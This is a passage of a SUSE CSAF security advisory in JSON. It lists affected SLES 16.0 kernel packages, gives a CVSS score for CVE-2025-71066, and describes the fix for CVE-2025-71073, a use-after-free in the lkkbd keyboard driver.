"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71073"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk-\u003etq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71073",
"url": "https://www.suse.com/security/cve/CVE-2025-71073"
},
{
"category": "external",
